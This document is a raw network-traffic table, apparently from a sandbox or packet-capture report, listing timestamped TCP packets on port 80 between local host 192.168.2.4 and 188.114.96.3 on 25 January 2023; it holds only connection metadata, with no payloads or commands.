Jan 25, 2023 09:28:21.131818056 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.131835938 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.131860971 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.131871939 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.131891012 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.131901026 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.131910086 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.131928921 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.131938934 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.131958008 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.131968021 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.131985903 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.131995916 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.132014990 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.132025957 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.132044077 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.132055044 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.132072926 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.132083893 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.132102966 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.132112026 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.132131100 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.132141113 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.132158995 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.132169008 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.132188082 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.132198095 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.132216930 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.132226944 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.132246017 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.132256031 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.132275105 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.132286072 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.132304907 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.132314920 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.132334948 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.132344961 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.132364035 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.132374048 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.132392883 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.132402897 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.132422924 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.132432938 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.132452011 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.132462025 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.132481098 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.132491112 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.132512093 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.132522106 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.132541895 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.132551908 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.132570028 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.132580042 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.132599115 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.132608891 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.132627964 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.132637978 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.132657051 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.132668018 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.132687092 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.132695913 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.132714987 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.132725954 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.132745981 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.132755995 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.132775068 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.132785082 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.132803917 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.132817030 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.132836103 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.132846117 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.132863998 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.132874966 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.132894039 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.132903099 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.132921934 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.132931948 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.132951021 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.132961035 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.132980108 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.132988930 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.133009911 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.133019924 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.133039951 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.133059978 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.133070946 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.133080959 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.133100033 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.133111000 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.133128881 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.133140087 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.133158922 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.133167982 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.133187056 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.133197069 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.133215904 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.133225918 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.133245945 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.133255005 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.133275032 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.133284092 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.133304119 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.133312941 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.133332968 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.133343935 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.133362055 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.133372068 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.133392096 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.133402109 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.133421898 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.133430958 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.133450031 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.133460045 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.133479118 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.133488894 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.133507967 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.133517027 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.133534908 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.133546114 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.133565903 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.133575916 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.133594990 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.133605003 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.133624077 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.133632898 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.133660078 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.153304100 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.153352976 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.153379917 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.153408051 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.153434038 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.153460026 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.153486967 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.153486967 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.153507948 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.153507948 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.153520107 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.153537989 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.153564930 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.153592110 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.153621912 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.153634071 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.153647900 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.153671026 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.153697014 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.153722048 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.153736115 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.153748035 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.153773069 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.153785944 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.153809071 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.153820992 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.153842926 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.153867006 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.153901100 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.153917074 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.153938055 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.153964043 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.153983116 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.154005051 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.154028893 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.154042959 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.154069901 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.154082060 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.154098034 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.154122114 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.154129982 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.154154062 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.154165030 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.154189110 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.154213905 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.154221058 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.154242992 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.154258966 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.154278994 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.154314995 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.154339075 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.154350996 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.154373884 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.154386044 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.154408932 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.154421091 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.154444933 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.154460907 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.154481888 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.154494047 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.154516935 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.154531956 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.154552937 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.154566050 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.154588938 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.154611111 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.154630899 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.154640913 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.154664993 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.154678106 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.154721975 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.154742002 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.154766083 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.154773951 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.154798031 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.154817104 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.154834986 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.154859066 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.154874086 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.154901028 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.154910088 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.154920101 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.154942989 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.154953957 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.154978991 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.154998064 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.155015945 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.155030012 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.155052900 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.155065060 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.155090094 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.155113935 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.155128002 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.155153990 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.155168056 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.155188084 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.155205011 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.155214071 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.155236959 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.155261040 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.155282974 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.155298948 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.155313015 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.155335903 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.155349016 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.155374050 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.155385017 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.155409098 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.155421972 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.155483007 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.159106016 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.159136057 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.159162045 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.159185886 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.159218073 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.159228086 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.159250975 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.159265041 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.159276962 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.159300089 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.159323931 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.159348965 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.159374952 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.159384966 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.159400940 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.159421921 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.159447908 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.159478903 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.159488916 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.159513950 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.159538984 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.159564018 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.159575939 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.159589052 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.159614086 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.159638882 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.159665108 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.159686089 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.159702063 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.159713030 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.159735918 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.159760952 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.159805059 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.159907103 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.159930944 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.159950018 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.159966946 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.159990072 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.160015106 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.160032988 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.160052061 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.160063028 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.160085917 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.160111904 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.160139084 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.160156012 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.160176039 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.160187960 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.160211086 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.160235882 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.160260916 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.160288095 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.160301924 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.160314083 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.160337925 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.160362959 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.160386086 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.160406113 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.160423994 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.160435915 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.160459042 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.160484076 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.160509109 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.160526991 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.160545111 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.160557032 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.160578966 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.160604000 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.160629034 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.160645008 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.160665989 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.160676956 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.160700083 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.160723925 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.160748959 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.160773993 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.160789013 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.160799980 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.160825014 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.160850048 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.160876989 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.160892963 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.160914898 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.160926104 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.160949945 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.160975933 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.161010027 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.161031008 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.161041021 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.161062002 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.161068916 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.161087036 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.161107063 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.161128044 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.161137104 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.161154032 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.161164999 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.161184072 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.161205053 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.161226034 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.161235094 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.161252975 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.161261082 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.161282063 CET	80	49736	188.114.96.3	192.168.2.4
